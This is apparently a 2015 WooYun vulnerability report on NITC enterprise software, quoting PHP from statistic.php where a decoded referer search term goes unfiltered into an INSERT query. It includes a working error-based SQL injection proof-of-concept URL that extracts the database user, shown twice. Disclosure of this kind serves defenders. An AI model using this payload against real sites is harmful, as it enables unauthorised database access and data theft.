NITC企业版SQL注入#3 | wooyun-2015-090952

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-090952

漏洞标题：

NITC企业版SQL注入#3

漏洞详情

披露状态：

2015-01-13：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-04-13：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

在statistic.php中:

if ( trim( $_GET['pageurl'] ) != "" )
{
    $search_text = "";
    $referer = trim( $_GET['referer'] );
    $domain = substr( $referer, strpos( $referer, "//" ) + 2 );
    $domain = substr( $domain, 0, strpos( $domain, "/" ) );
    if ( strpos( $domain, "google." ) === FALSE )
    {
        $string = explode( "q=", $referer );
        $string = explode( "&", $string[1] );
        $search_text = urldecode( $string[0] );
    }
.....
.....
 $search_text = str_replace( "+", " ", $search_text );
    time( )( "insert into ".$site->table( "statistics" )." (referer,pageurl,firsttime,lasttime,timezone,ip,date_added,domain,search_text) value
    ('".trim( $_GET['referer'] )."','".trim( $_GET['pageurl'] )."','".trim( $_GET['firsttime'] )."','".trim( $_GET['lasttime'] )."','".trim( $_GET['timezone'] )."','".real_ip( )."','".date( "Y-m-d H:i:s", time( ) )."','".$domain."','".$search_text."')" );

在这里$search_text可以通过$_GET['referer']的值转变而来，然后做了一次urldecode解码操作,但解码后没有做任何过滤。接着就带入到了最后的insert语句中，造成sql语句
POC:
statistics.php?pageurl=123&referer=//google.php?q=asd%27 or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a))-- /

漏洞证明：

POC:
statistics.php?pageurl=123&referer=//google.php?q=asd%27 or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a))-- /

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源路人甲@乌云